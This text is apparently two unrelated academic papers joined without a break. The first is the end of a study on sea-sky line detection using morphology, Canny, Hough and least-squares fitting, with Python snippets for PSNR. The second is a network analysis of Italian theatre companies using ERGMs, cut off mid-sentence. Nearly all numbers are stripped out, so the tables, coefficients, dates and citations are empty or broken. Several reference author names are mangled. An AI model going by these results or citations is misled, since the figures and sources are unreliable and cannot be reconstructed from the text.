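    ys_pix, xs_pix = np.nonzero(cleaned)
    a0 = (y2 - y1) / (x2 - x1 + 1e-9)              # slope of the hough segment
    near = np.abs(ys_pix - (y1 + a0 * (xs_pix - x1))) < 3
    a, b = np.polyfit(xs_pix[near], ys_pix[near], deg=1)
```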
e. straight line fitting

the hough line detection extracts the longest line segment, but the sea-sky line is a straight line that crosses the whole picture. the points belonging to the detected segment are therefore extracted and fitted, and the final sea-sky line, running through the whole image, is obtained by selecting some of these points and fitting a straight line with the least-squares method. the least-squares method is a mathematical optimization technique that finds the best-fitting function by minimizing the sum of the squared errors; it allows the unknown parameters to be obtained simply while keeping the sum of the squared deviations between the fitted and the actual data at a minimum.

iv. experiment and result analysis

to verify this method, three sea-sky background images taken in different environments were selected, as shown in fig. : fig. (a) is a sea-sky image with low visibility, fig. (b) is a sea-sky image with a strong watermark, and fig. (c) is a sea-sky image with uneven illumination. the operations were carried out in matlab, and two mathematical morphological processing cases were compared and analysed. two preprocessing methods were applied before the sea-sky line detection: the first uses the gauss filter to reduce noise and then detects the sea-sky line, with the results shown in fig. ; the second uses the mathematical morphology filter to reduce noise and then detects the sea-sky line, with the results shown in fig. . as seen from fig. (b), the former method is not ideal for sea-sky pictures with a strong watermark, and an error occurs. from fig.  it can be seen that the method of this paper can accurately detect the sea-sky line in the different environments.

[figure . original pictures of the sea-sky background: (a), (b), (c)]

[figure . sea-sky line detected after gauss filter processing: (a), (b), (c)]

[figure . sea-sky line detected after mathematical morphological processing: (a), (b), (c)]

fig.  shows the sea-sky lines detected by the algorithm in this paper. to measure the quality of the processed images, the psnr value is usually used to judge whether a particular processing scheme is satisfactory. thus, to evaluate the experimental results quantitatively, the performance of the sea-sky line detection on the three sea-sky background images is compared using the peak signal-to-noise ratio (psnr). the psnr measures the ratio between the peak signal power and the noise power: a psnr between  db and  db indicates little noise, and a higher psnr indicates a better processing effect [ ]. the expression of the psnr is given in formula ( ):

$\mathrm{psnr} = 10 \lg\!\left(\dfrac{\max_f^{\,2}}{\mathrm{mse}}\right)$   ( )

in formula ( ), $\max_f$ is the maximum grayscale value of the image f(x, y), and mse is the mean-square error, which reflects the deviation between the estimate and the quantity being estimated, as given in formula ( ):

$\mathrm{mse} = \dfrac{1}{m\,n} \sum_{x=1}^{m} \sum_{y=1}^{n} \big[ g(x, y) - f(x, y) \big]^{2}$   ( )
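the two quality measures of formulas ( ) and ( ) can be written directly from their definitions; the following python sketch uses a toy image corrupted by mild gaussian noise, and the array sizes, noise level and printed value are illustrative assumptions only.

```python
import numpy as np

def mse(f, g):
    # mean-square error between the original image f and the processed image g
    f = f.astype(np.float64)
    g = g.astype(np.float64)
    return np.mean((g - f) ** 2)

def psnr(f, g, max_value=255.0):
    # peak signal-to-noise ratio in dB; larger values mean less noise
    e = mse(f, g)
    if e == 0:
        return float("inf")
    return 10.0 * np.log10((max_value ** 2) / e)

# toy check: a flat image corrupted by gaussian noise of sigma = 5
rng = np.random.default_rng(0)
f = np.full((64, 64), 128, dtype=np.uint8)
g = np.clip(f + rng.normal(0, 5, f.shape), 0, 255).astype(np.uint8)
print(round(psnr(f, g), 1))   # roughly 34 dB for sigma = 5
```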
the quantitative evaluation data obtained in the experiments are shown in table .

table i. comparison of psnr values of the experimental results

            image processed by the gaussian filter    image processed by the filter in this paper
            mse        psnr /db                        mse        psnr /db
fig. (a)     .          .                              .          .
fig. (b)     .          .                              .          .
fig. (c)     .          .                              .          .

from the psnr values in table  it can be seen that, for the sea-sky background pictures processed by the gauss filter, the picture quality is high in most cases. however, for fig. (c) the psnr value is lower than  db; thus, for the unevenly illuminated sea-sky background picture, the gauss filter cannot effectively handle the uneven illumination problem. for fig. (b), the psnr value after gauss filtering is higher than that obtained after the mathematical morphological filtering, so the picture quality after gauss filtering is relatively higher, which shows that the gauss filter can effectively remove the interference of the strong watermark. however, according to the detection result in fig. (b) after gauss filtering, although the gauss-filtered picture has better image quality and the watermark interference is removed, more detail information along the sea-sky boundary is also lost, so that valid edge points are erroneously removed and an accurate sea-sky line cannot be obtained.

as seen from table , the psnr values of the images processed by the mathematical morphological filter of this paper all lie between  db and  db, which indicates good image processing quality. combined with fig. , this shows that the algorithm in this paper can effectively preserve the details of the sea-sky boundary, so that more accurate sea-sky lines are obtained. the sea-sky lines in the different sky-sea background images are all detected, which objectively reflects the feasibility and superiority of the algorithm in this paper.

mathematical morphology is also applied to remove the interference points after edge detection with the canny operator. after the interference points are removed, the hough transformation is used to extract the sea-sky lines, achieving the final detection and fitting; the detection results are shown in fig. . the binary pictures obtained after canny edge detection are processed with mathematical morphology, and the experimental data in table  are analysed by comparing the number of valid points retained before and after this second morphological processing.

table ii. number comparison of valid points before and after the mathematical morphology processing

            possible points a    valid points b    ratio b/a    time-consuming /ms
fig. (a)                                              %
fig. (b)                                             . %
fig. (c)                                             . %

from table  it can be seen that, after the second morphological processing based on the special structural element, the interference points around the sea-sky line can be reduced effectively. because the edge extraction uses the canny operator, all possible edges are detected;
however, only the single required sea-sky line is needed, and at the same time some interference points are unavoidably produced during edge detection. under the premise of guaranteeing the ratio (b/a) of valid sea-sky line information points, the effective detail of the sea-sky line is protected while the number of possible points (a) is effectively reduced. from the data in table  it can also be seen that the interference information produced by edge extraction is lower for the image with low visibility, whereas for the image with uneven illumination more interference information is produced by the preprocessing and edge extraction; this interference causes problems for straight-line detection and fitting and makes the sea-sky line extraction difficult and inaccurate. at the same time, the second morphological processing shortens the time of straight-line detection and improves the efficiency of the algorithm in this paper: because mathematical morphology is used, the amount of computation in the hough detection is reduced, and the interference affecting the sea-sky line fitting is reduced as well. thus the algorithm in this paper ensures both the efficiency and the accuracy of the sea-sky line detection, achieves the expected effect, and gives an ideal extraction result for the sea-sky lines.

v. conclusion

this paper presents a method of sea-sky line detection based on mathematical morphology. firstly, the image is preprocessed by mathematical morphological filtering; the canny operator is then used to extract the sea-sky boundary. secondly, mathematical morphology is applied once more to remove the interference points on the sea-sky line; finally, the sea-sky line is detected by the hough transform and fitted by the least-squares method. the experimental results show that the algorithm can detect the sea-sky lines with good robustness and high accuracy, and that it can effectively cope with the complex marine environment and weather effects.

references
[ ] messages, zhengjia, under combined. sea-sky line detection algorithm based on morphological processing and least square method [j]. optics and optoelectronic technology, ( ): - .
[ ] liang d, zhang w, huang q, et al. robust sea-sky-line detection for complex sea background [c]// ieee international conference on progress in informatics and computing. ieee: - .
[ ] h. wang, z. wei, s. wang, et al. a vision-based obstacle detection system for unmanned surface vehicle [c]// proceedings of the ieee conference on robotics, automation and mechatronics: - .
[ ] wang bo, su yumin, wan lei, et al. sea sky detection method based on gradient saliency for surface unmanned craft [j]. acta optica sinica, ( ): - .
[ ] dryden, zhang xinggang. a method of periodic noise removal based on weights adaptive morphology [j/ol]. computer technology and development, (a): - .
[ ] jiang l, guo y. image edge detection based on adaptive weighted morphology [j]. chinese optics letters, ( ): - .
[ ] feng gui, gui pre-, wind, lin. morphological method in edge detection of gray image [j]. remote sensing information: - .
[ ] wanghuifeng, war guile, luo xiaoming. research and application of edge detection algorithm based on mathematical morphology [j]. computer engineering and applications, ( ): - .
[ ] zhong junliang.
real-time detection and tracking technology of infrared small and dim targets [d]. graduate school of the chinese academy of sciences (changchun institute of optics and fine mechanics and physics).
[ ] wang fang, changwei, li wenshu. image edge extraction method based on mathematical morphology [j]. mechanical engineering and automation, ( ): - .
[ ] li mu, chi ge, et al. adaptive canny operator edge detection technology [j]. journal of harbin engineering university, ( ): - .
[ ] wang guangling. research on the algorithm of detecting and tracking video velocity based on moving objects [d]. taiyuan university of technology.
[ ] zhanghuang, yu shenglin, bai bangong. selecting principles for structural elements in morphological image denoising [j]. data acquisition and processing, s : - .
[ ] dong yu star, liu weining, dongyu-xing. small target detection for sea-sky background based on gray character [j]. china optics, ( ): - .
[ ] lu junwei, wang xiaodong, et al. sea-sky line detection algorithm based on fractal feature and hough transform [j]. journal of the naval institute of aeronautical engineering, ( ): - .
[ ] xu tianji, zhang guican, et al. watershed color image segmentation based on morphological gradients [j]. computer engineering and applications, (one): - .

strategic and genetic networking: relational endowment in a local cultural offer

andrea gallelli, sociologist, independent researcher

abstract
the local theatrical offer is the result of all the theatre companies which perform shows in each other's venues. theatre hospitality is an inherently relational phenomenon, and besides big national and international tours, it is an important part of the local cultural landscape. aiming to contribute to the literature on network analysis applied to the study of culture, this research adopts the network perspective to test hypotheses on companies' relational behaviors and mechanisms of network formation in a local context in italy. the analyses show that companies which get more public funding tend to host more; there is a homophily effect based on audience levels; and companies tend to reciprocate hospitality relations and to form clusters of close collaborations.

keywords: cultural production; theatre; social network analysis; ergm; arts

this research did not receive any specific grant from funding agencies in the public, commercial, or not-for-profit sectors.

author
andrea gallelli holds a phd in sociology from the university of turin, where he conducted research on the relational dimension of culture. he has been a post-doctoral research fellow at the university of bologna, where he worked for the eu project interco-ssh (international cooperation in the social sciences and humanities), about the institutionalization of the social sciences in europe, with a special focus on networks in scientific production and the international circulation of key authors such as bourdieu and gramsci. his research mainly focuses on social capital and social networks, with applications on cultural production, scientific communities and social exclusion.

acknowledgements
this work would not have been possible without the collaboration and the data provided by osservatorio culturale del piemonte. my thanks go to the ocp staff. the author is also indebted to valerio leone sciabolazza, university of florida, for precious technical support on erg models.
please send all correspondence to andrea.gallelli@mail.com connections strategic and genetic networking | volume | issues & | insna.org . introduction what do we see when we go to the theatre? of course we see a company performing a piece, and our cultural tastes are responsi- ble for whether we enjoy the show or not. but tastes apart, when we go to the theatre we probably see a company which does not own the venue in which the show is taking place. so, in most cases, when we decide to go to the theatre we make a dou- ble choice: we choose a show, because we think we will probably enjoy it, and we choose a theatre, because it is close to home, because it is beautiful, because we have a subscription, and so forth. in any case, that specific show involves two dif- ferent subjects, one company and one thea- tre. and so it is for all the theatre seasons. so, we can say that the whole cultural offer in a specific place in a specific moment, is the result of all the possible pairs of host- ing and hosted subjects. if we now turn the perspective from the consumer (who goes to the theatre) to the producer (any possible local theatre company), we understand that each theatre season is the result of the movement of all the companies that host each other. this is precisely hospitality in theatre, it is an in- herently relational phenomenon, consisting of connections among theatre companies that perform in each other’s spaces, and, together with big national and international companies’ tours, it is a very important part of the local cultural landscape. so, what are the reasons that lead two particular companies to connect? are there companies more inclined to host, and others more inclined to move? are there groups of companies that tend to host each other, forming cultural clusters? are con- nected companies somehow similar? in this study we observe the struc- tural properties of the theatre offer in a lo- cal context in italy, and we propose hy- potheses about network formation mecha- nisms. we use network descriptives and exponential random graphs models, which allow a joint observation of individual properties and structural configurations, in order to observe the social mechanisms that shape the cultural offer. . analytical framework . an introduction to the relational look on culture scholars and experts in widely different fields have underlined the importance of the relational dimension of cultural pro- duction, which has been defined and em- pirically shown in different ways. broadly speaking, major sociologists agree on a vi- sion of the cultural field as somehow grounded on systems of relations generat- ing and maintaining it. for pierre bourdieu social capital consists of “the aggregate of the actual or potential resources which are linked to the possession of a durable network of more or less institutionalized relationships of mutu- al acquaintance and recognition” ( , p. ), and these sets of relational resources, together with economic and cultural capi- tal, are responsible for the position occu- pied by each individual within the social space of a field. following howard becker, “all ar- tistic work, like all human activity, in- volves the joint activity of a number, often a large number, of people. through their cooperation, the art work we eventually see or hear comes to be or continues to be” ( , p. ). 
in the analysis of cultural production he underlines the importance of networks, considered as the cooperative activity of all the subjects involved in the construction of the art worlds. moreover, according to the produc- tion of culture perspective (peterson and anand ) the industry structure in the creative fields depends on the ways in which producers relate to one another – many small enterprises in competition, few big vertically integrated ones, or different combinations of these forms – and the dif- ferent configurations of producers deter- mine the presence of certain kinds of prod- ucts in the marketplace. strategic and genetic networking connections insna.org | issues & | volume | each of these approaches empha- sizes a different aspect of the structural properties of the cultural field. bourdieu focuses on the positions of the subjects in- volved in the field, and on how these posi- tions generate advantages in the field for those with a good social capital base. becker attributes great importance to rela- tions as a necessary part of the creative process. the production of culture perspec- tive looks at the characteristics of groups of producers in order to assess some gen- eral properties of cultural markets and in- dustries. even with substantial differences, all these perspectives on culture recognize that the ways in which the producers relate among them have profound consequences in shaping the cultural field. furthermore, evidence has been provided on how social network analysis, as both a theoretical and a technical set of tools, may be a common ground on which these different relational perspectives on the cultural field may inte- grate (mclean ; fox ; bottero and crossley ; de nooy ). in this sense there is a joint focus to the inquiry on culture from different theories and ap- proaches, with the possibility of agreement on some aspects of its relational founda- tion. but in spite of the possibility of a general common relational look on culture, there is a risk arising from the application of network methods to a complex and mul- tifaceted phenomenon like culture: the ex- cess of description. network analysis, as a methodological toolbox, must be applied in the light of a comprehensive theoretical framework in order to provide meaningful explanations, and not just meticulous de- scriptions of cases. having declared this theoretical need, it must be stated that at the point at which research has arrived to- day in this field, we cannot count on a co- herent and well defined perspective on re- lations and cultural production. at the same time our aim is not to use the case under our observation to verify one specif- ic theory. rather, from the review of dif- ferent theories and empirical studies, we propose an inductive theoretical path, from which will emerge a possible common framework for the analysis of relations within cultural fields. . strategic and genetic networking there is increasing interest in the empirical analysis of the cultural field through net- works. researches in different artistic and cultural domains have in common the use of networks as lenses on consumption or production processes. what distinguishes these researches is the different, even if not mutually exclusive, function they attribute to networks. on the one hand networks may be seen as the result of a set of indi- vidual properties or abilities that are used in the field in a strategic way in order to follow specific goals. 
on the other hand networks are used with their structural properties in order to understand some ge- netic characteristics of the field and the so- cial processes behind it. based on these in- terpretations, grounded in the thought of the above-mentioned authors, we can dis- tinguish a strategic and a genetic function of networks. the strategic function of networks refers to the (conscious or subconscious) deployment of relational resources within a field with the result of increasing the chances of achieving an objective. in contemporary literature on cul- tural production there are some empirical examples of such a strategic role of rela- tions. for example research on institutional networks in the cultural field, like festival networks (gallelli ) and museum con- sortia (bagdadli ), shows important results about network creation processes and the way in which the relations support economic performance. for some subjects, the lack of economic capital may be inte- grated with relational resources, allowing a weak organization to survive in the market. the availability of “complementary re- sources”, like networks, is considered a key factor in the formation of alliances. studying the fashion industry in milan, d’ovidio ( ) has shown that cultural workers, working together, trigger virtuous connections strategic and genetic networking | volume | issues & | insna.org mechanisms of mutual recognition and trust which support the companies in estab- lishing themselves and gaining success. these aspects are in line with a bourdesian view of capital conversion, particularly at- tuned to artistic production in which, often, the power of economic relations may be dominated by networking dynamics. the genetic function of networks refers to the relational elements embedded within a social structure, which have an in- fluence on the way in which a phenome- non eventually manifests. research on cul- tural districts (mizzau and montanari ; santagata ) shows how links between the subjects in the field foster cre- ative processes, cooperation and the supply of cultural activities, and also how rela- tions among the producers generate a ‘cre- ative atmosphere’ that supports production processes (bertacchini and santagata ). economic sociologists also argue that in the contemporary economy, the so- cial and relational dimensions of innova- tion processes are becoming more im- portant than the organizational characteris- tics of the firms. innovative processes grow not only inside the boundaries of the companies, but also through both formal and informal relations among them (trigil- ia ). in their pioneering study on crea- tive teams in broadway musical produc- tion, uzzi and spiro ( ) looked widely into the structural properties of artistic co- operation. they have shown that financial as well as artistic success is associated with medium levels of small world(ness) (see milgram ) that is, sets of rela- tional configuration characterized by short global separation between the clusters and high local cohesion. networks have also been used to demonstrate the mechanisms of diffusion of a music scene (crossley ; ), showing how relational dynamics are as important as local historical and biograph- ical processes for the genesis of a cultural phenomenon. 
in a recent collection of em- pirical applications of network studies to music worlds, the relevance of the rela- tional approach for all the domains in- volved with cultural production, such as production processes, tastes, gender rela- tions, careers, and so forth has been widely proved (see crossley et al. ). as widdop states: ‘being active in music [we can generalize in culture] is much more complex than simply basing it on theoreti- cal assumptions of class and education; it is fundamentally a social act; the level to which you engage in music [culture] and the genres you attach to are somewhat de- pendent upon the networks you are em- bedded in and position in the social struc- ture’ ( , p. ). arguably, it is not rare to observe relational processes with mixed functions. for example, starkey, barnatt and tempest ( ) describe the case of latent organizations: informal key configurations of stable subjects, which emerge according to social mechanisms related to trust and mutual cooperation and are employed stra- tegically for sustaining processes of pro- duction and divulgation of cultural goods and activities in the marketplace. . networked theatre companies: research hypotheses as mentioned above, theatre companies performing in each other’s venues create a network of hospitality relations that is a relevant part of their activity. besides the intrinsic artistic value, these relations have a strategic function and constitute genetic processes that characterize the local cultur- al offer. in our empirical case, we interpret the social status related to hospitality rela- tions, as a strategic element of the produc- tivity of the companies. the prestige of the hosting and hosted subjects (sometimes theatre websites advertise ‘prestigious hos- pitality’ alongside the company’s reper- toire) may be a vehicle of success, as in the case of small companies which manage to perform in big theatres, or small theatres that host well-established companies; in this sense the tendency to create links does strategic and genetic networking connections insna.org | issues & | volume | not necessarily reflect the companies’ eco- nomic resources (hypothesis ). this hypothesis is based on the in- terpretation of social capital as a strategic complementary resource, rather than a form of capital which increases propor- tionally to other forms of capital. it might be true in some cases that the wealthier an organization, the better its chances of at- tracting relations; but it is also true in many cases that artistic collaborations arise to support the absence of economic capital or other resources, especially in periods of crisis and for small subjects. in order to investigate some of the genetic mechanisms embedded in the rela- tions among companies, we borrow from network theory an influential concept, which may help to understand some of the processes related to network formation. the homophily argument (mcpherson et al. ), refers to the tendency for people or organizations to form ties dispropor- tionately with others who share similar at- tributes with them. in our case, the similar- ity of organizational features between two companies may explain the emergence of recurrent patterns of artistic collaboration. even if small companies strive to perform in big venues, it is more probable that in their daily artistic activity they will con- nect with other small subjects; and also big theatres will be more inclined to host fa- mous companies in order to ensure ade- quate ticket sales. 
therefore, we can hy- pothesize that companies tend to connect to others with similar organizational char- acteristics (hypothesis ). moreover, while pure market rela- tions are mostly unidirectional and based on economic convenience, artistic collabo- rations, as mentioned, may foster mutual recognition and trust, which are generated by reciprocity. accordingly, we hypothe- size that if one company hosts another one in its own venue, there are good chances that this relation will be reciprocated (hy- pothesis ). hospitality allows information transmission, as it implies direct contacts between the two subjects. these kinds of relations produce a fund of information within a defined territory, knowledge of who works with whom, the prospect of possible collaborators, useful information about the characteristics of the other sub- jects and the market conditions in which they operate. nonetheless, hospitality may ensure a certain margin of uncertainty con- trol. even in periods of crisis, companies embedded in dense networks of collabora- tions, may count on a greater possibility of performing, compared to isolated ones. as a result, relations among companies tend to be embedded in dense groups (hypothesis ). successful cultural cooperation is likely to result in relational configurations that are more complex than simple reciprocal dyads. especially in local cultural markets in which there are small geographical sepa- rations among the subjects, we expect to find triadic closure, that is, relations in which, if subjects a and b are connected, and a and c are connected, b and c will also probably share a link. this is one of the typical (genetic) mechanisms that can be found in creative contexts, such as cul- tural clusters, ‘art worlds’ or scenes, in which widespread collaboration and rela- tional closure are tangible. . data and methods . data our empirical analysis is based on data about hospitality shows in piedmont, italy, among professional companies. the source of the (anonymized) data is the cultural observatory of piedmont (ocp), a private organization in partnership with the region, which conducts research in the field of cul- tural goods and activities. for the selection of the subjects involved in the study we followed the definition of ’professional company’ according to the regional law / concerning the system of public contribution to theatre activities. public funds are distributed to companies on the basis of criteria concerning artistic and economic standards, such as a minimum number of shows per year or the number of connections strategic and genetic networking | volume | issues & | insna.org paid hours per actor. our data concern all the companies that met the regional criteria in . as a result we were able to recon- struct the whole network of the regional professional companies in that year. the ties are directed, where the direction indi- cates if the company was the hosting sub- ject (incoming relation) or the one that per- formed the show (outgoing relation). data about individual characteris- tics of the companies were also available, concerning some economic and perfor- mance indicators. . ergm for our analyses we applied both the de- scriptive analytical tools available with ucinet software (borgatti et al ) and statistical modelling for network data. exponential random graph (erg) family models (lusher et al ; robins et al ) have the purpose of explaining the different interwoven mechanisms respon- sible for shaping the network as we empir- ically observe it. 
they are designed to deal with types of effects at different analytical levels. in our case we consider nodal at- tributes, which are organizational and eco- nomic characteristics of the companies, and structural effects, network configura- tions useful for capturing endogenous so- cial mechanisms. relational social dynamics, by def- inition, violate the assumption of inde- pendence of the observations on which standard statistical models are based, thus erg models are explicitly designed in or- der to include the mutual dependence of the nodes . as a result erg models are appropriate to our purposes because they meet both a technical need – the fact that two companies are tied makes them mutu- ally dependent – and the theoretical rele- where the models do not include any network effects, as the following model , the erg mod- els are similar to traditional logistic regression models, analyzing the presence or absence of a relation between two nodes as dependent varia- ble. vance of analyzing the joint effect of indi- vidual and structural determinants. . variables and models in the first part of the analysis we analyze relational metrics useful for describing the general structural properties of our net- work. secondly we present two models, the first one with only nodal attributes, with the aim of understanding which indi- vidual characteristics of the companies ex- plain the emergence of artistic links. among these variables we consider the age of the companies, to control the fact that older companies might have a wider knowledge of the other subjects in- volved in the field and consequently more chances to connect with them. secondly, we analyze the impact of the amount of funding (expressed in mil- lions of euro) received by the company, as a proxy for its economic resources, on the probability of sending (nodeocov) and receiving (nodeicov) ties, in order to understand how the relational behavior of a company is related to its economic capaci- ty. moreover, with the aim of testing the homophily hypothesis (explained above), we consider a set of variables re- garding the overall audience of the compa- nies (through the total number of tickets is- sued, including free ones, divided into classes: up to tickets per year; from to ; over ), the city in which the company is settled (four pied- montese provinces), and the number of shows performed in schools (as a proxy for a more education-oriented, rather than a more market-oriented artistic behavior of the company). in model we add structural ef- fects. reciprocity concerns a mutual rela- tion between two companies: if they each host and are hosted by others, this indicates a strong and clustered artistic collabora- tion. secondly we analyze popularity and expansiveness effects, observed re- spectively by gwidegree and strategic and genetic networking connections insna.org | issues & | volume | gwodegree statistics. these parame- ters control for particularly unbalanced de- gree distributions, concerning respectively incoming and outgoing relations. these are useful to understand if the field is domi- nated, on the one hand, by subjects who at- tract the majority of the other companies, and, on the other hand, if there are some subjects particularly active and known in the field who perform in most of the local theatres. lastly, the model also includes transitivity and hierarchy mechanisms. in the first case we control for transitive clo- sure through the geometrically weighted edgewise shared partners (gwesp) pa- rameter. 
it captures the typical triangular pattern, in which actor a is connected to actor b, actor b is connected to actor c, which in turn is connected to actor a. this configuration is particularly relevant in order to catch clusters of companies with cultural-artistic uniformities that tend to collaborate. on the other hand, in the second case, we control for the presence of hierarchical configurations in the network. the gwdsp parameter (geometrically weighted dyadwise shared partners) catches the tendency in the field for some companies who do not collaborate to be at least indirectly connected to a common third company, showing a more hierarchical, non-triangular, configuration.

. analysis

. network descriptives

figure , elaborated with gephi (bastian et al. ), is a graphical representation of the hospitality relations among the companies. as mentioned, the direction of the arrow indicates whether the company is performing or hosting; the size of the node is proportional to the degree of the company (also indicated inside the circle), irrespective of the direction of the relations. the different colors of the nodes aim to give a general indication of the level of embeddedness of the companies in local clusters with dense sub-networks. the algorithm (blondel et al. ) is a heuristic method based on modularity optimization, useful for unfolding the community structures of networks. as we can see there are four sub-groups of companies with greater levels of density inside the groups than outside. this gives a first general indication of the fact that in our field of observation there is a certain degree of recurrent collaboration among some actors, which makes the cultural offer somewhat segmented.

[figure : network of hospitality relations among professional theatre companies in piedmont]

so, to what extent do the companies connect with one another? the density of the overall directed network is . (table ), meaning that almost % of all the possible connections among all the nodes is actually present. if we do not consider the direction of the collaborations, regardless of whether a company is hosting or performing a show, but just consider the presence of a relation between them, the density is around %. generally speaking this is not a particularly high level of density, but it is high enough considering that our cases are theatre companies potentially in competition within the market of the cultural offer of a territory. the generally high level of connection among the companies is also shown by the average degree, indicating that, regardless of the direction of the collaboration, one company is tied on average with . others. centralization metrics, in particular the in-centralization value of around %, show that, even if there is a diffuse local cultural collaboration in the whole field, shown by the presence of many dyads, at the same time some theatres (in figure  two of them are immediately visible) have a higher propensity to host. these may be recognized as well-known venues, in which probably every company aims to perform in order to gain visibility and success. in every local cultural scene there are one or two theatres which are considered the best (or simply the biggest) ones. in spite of these market characteristics, the field seems to be quite accessible and open; for example, there is an average distance of about . between any two companies, meaning that even if i did not collaborate with a specific company which i am interested in, i probably know someone who did. this general feature of the field is useful not only for direct collaboration, but also for easy access to information and the formation of conventions. on that line, the clustering coefficient shows that on average over % of the companies connected to a focal one are in turn in touch with one another.

table : network descriptives

                          directed    un-directed
density                      .            .
avg. degree                  .            .
in-centralization            .            .
out-centralization           .            -
avg. distance                .            .
avg. clustering coeff.       .            .
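descriptive measures of the kind reported in table  can be reproduced on any directed hospitality network with standard tools. the following python/networkx sketch uses a small made-up graph, since the ocp data are not public; the edge list, the node names and the resulting values are purely illustrative assumptions.

```python
import networkx as nx

# hypothetical directed hospitality network: an edge u -> v means that
# company u performed in company v's venue (so v hosted u)
edges = [("a", "b"), ("b", "a"), ("a", "c"), ("c", "d"),
         ("d", "a"), ("b", "d"), ("e", "b"), ("c", "e")]
g = nx.DiGraph(edges)

density = nx.density(g)
reciprocity = nx.reciprocity(g)                       # share of mutual dyads
avg_clustering = nx.average_clustering(g.to_undirected())
avg_distance = nx.average_shortest_path_length(g.to_undirected())
avg_degree = sum(d for _, d in g.degree()) / g.number_of_nodes()

print(f"density={density:.2f}  reciprocity={reciprocity:.2f}  "
      f"clustering={avg_clustering:.2f}  distance={avg_distance:.2f}  "
      f"degree={avg_degree:.2f}")
```

computed on the real piedmont network, measures of this kind are the ones summarized in table  and discussed above.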
between any two companies, meaning that even if i did not collaborate with a specific company which i am interested in, i probably know some- one who did; this general feature of the field is useful for matters regarding not on- ly direct collaboration, but also for easy access to information and formation of conventions. on that line, the clustering coefficient shows that on average over % of companies connected to a focal one, are in turn in touch with one another. table : network descriptives directed un-directed density . . avg. degree . . in-centralization . . out-centralization . - avg. distance . . avg. clustering coeff . . strategic and genetic networking connections insna.org | issues & | volume | so far we have focused on the gen- eral structural features of the field. these are important as tools to describe the rela- tional dimension of our observation con- text; but also considering that the network properties reflect the underlying social mechanisms responsible for the formation and the maintenance of the network itself. this perspective has deep theoretical roots in sociological thinking. for example, new economic sociology (granovetter ) in- terprets economic phenomena as embed- ded in systems of social relations. moreo- ver, following harrison white ( ), markets emerge from the interactions of producers, who relate to and observe each other trying to satisfy consumer’s requests. thus, particular structural properties are functional to the circulation of information, the formation of reputation, alliances and competitions. for example, becker’s ( ) ar- gument, in contrast to the classical theory of reputation in arts, is that reputation is formed and carried on within art worlds, and does not only depend on the artistic object itself. in this sense, the structural properties of an artistic field are indeed in- dicators of the social conditions in which information and judgments flow in real contexts. . models we now present the results of the models, which include individual and structural variables. we read the results as the impact of the single parameters on the tendency of forming a tie between any two companies, uncovering individual properties and en- dogenous mechanisms that are responsible for shaping the network. significant effects are presented in bold in table . the first parameter, edg- es, in both models is negative and signifi- cant; we interpret this variable as the inter- cept in standard regression models. in this case it indicates that the probability of ob- serving an edge, i.e. a couple of compa- nies, outside any other possible more com- plex relational configuration is negative; this value does not imply any substantive explanation, it simply indicates that the re- lational behaviors of the companies are ac- tually embedded in more complex social structures than dyads. in model significant coefficients are: funding in degree, audience homophi- ly for class and school performances. these variables have a positive effect, even though it is not particularly strong for funding and school performances, on the probability of forming ties. 
these effects can be interpreted as follows: a) there is a tendency for companies which get higher public economic support to have incoming relations; b) big companies tend to share ties with one another more than they do with smaller companies; c) the greater the difference in the number of shows per- formed in schools between two companies, the greater is the probability for them to share a tie, indicating relational heterophily based on the number of shows performed for students. this implies that sharing a more educational theatre activity is not a predictor of preferential connection among companies. the models have been estimated using statnet package for erg models in r (handcock et al., ) connections strategic and genetic networking | volume | issues & | insna.org table : erg models of tie formations among theatre companies model model edges - . - . ( . ) ( . ) age . . ( . ) ( . ) funding out degree (nodeocov) - . - . ( . ) ( . ) funding in degree (nodeicov) . . ( . ) ( . ) city (nodematch) . . ( . ) ( . ) audience homophily class (nodematch) . . ( . ) ( . ) audience homophily class (nodematch) - . . ( . ) ( . ) audience homophily class (nodematch) . . ( . ) ( . ) school performances (absdiff) . . ( . ) ( . ) reciprocity . ( . ) popularity (gwidegree) - . ( . ) expansiveness (gwodegree) - . ( . ) transitivity (gwesp) . ( . ) hierarchy (gwdsp) - . ( . ) aic . . bic . . standard errors in brackets. values in bold indicate significance at . level economic funding, audience levels and educational activity are variables that con- cern some individual characteristics of the companies. in the second model we added five structural variables in order to control strategic and genetic networking connections insna.org | issues & | volume | for endogenous relational mechanisms. at a general level, model is better speci- fied than model , as shown by aic and bic statistics which show lower values. like model , model also has a significant, though weak, effect of funding. this partially disproves hypothesis . in fact, if tie formation was independent from funding we would expect no effect at all. we see from one side no relation between funding and out degree, meaning that companies have outgoing relations regard- less of the different levels of public fund- ing they get; but on the other side incom- ing relations are somehow supported by higher levels of public contribution. this does not indicate a generalized influence of the funding on the tendency to connect with others, but probably a particular char- acteristic of the field that concerns a higher dependency of hosting institutions on pub- lic economic resources (probably the big and famous theatres we mentioned before). compared to model , in model also audience homophily for class is pos- itive and significant, meaning that, when controlling for endogenous mechanisms, the tendency to host one another emerges also for small companies. this result con- firms hypothesis , reinforcing the vision of a field in which there is a polarized clus- tering tendency among theatre companies. even if small companies probably aspire to perform in big venues, the whole field is actually characterized by groups of com- panies with similar audience levels which collaborate. this is a sign of what lazars- feld and merton ( ) called ‘status ho- mophily’, a process that leads people or organizations to connect with others of close social standing to themselves. 
reciprocity is positive and signifi- cant, this indicates that in the network of theatre hospitality, if one company hosts another one for a show it, in turn, will probably be hosted by the other company. these mechanisms of tie reciprocation show the presence of diffused collabora- tion exchange, confirming hypothesis . the model has good convergence. in appendix a we attach the gof diagnostic graphs. the negative and significant coeffi- cient for popularity (gwidegree) indi- cates that there is not much variation among hosting companies in their tenden- cy to attract others, meaning that there is a quite uniform distribution of incoming re- lations in the field. in the previous section we showed a high centralization coeffi- cient, indicating that there are some com- panies that attract ties more than others, but probably this characteristic involves a minor part of the relations, making the in degree distribution not particularly skewed. the non-significant coefficient for expansiveness (gwodegree) suggests there is no clear tendency for some com- panies to be disproportionally central per- formers, again showing a structure of the field not particularly dominated by a few central companies. gwdsp, used as a measure of hi- erarchy in the network, is negative but not significant; while transitivity is positive and significant. this shows the existence of clustered social relations, confirming hypothesis , in which company a and company b, which share a tie, will both probably be connected to company c. . discussion and conclusions hospitality in theatre is an inherently rela- tional phenomenon, and with their links the companies shape the local cultural of- fer. the analyses in the present article have contributed to show the relevance of the network perspective on a cultural field, and the fact that where there are relations among the subjects involved, we can effec- tively use formal methods to describe their strategic and genetic elements. to go back to our starting ques- tions, what do we know about theatre companies that collaborate? first of all we know that they do it. more precisely we know that companies which get more pub- lic funding tend to host more; we know there is a homophily 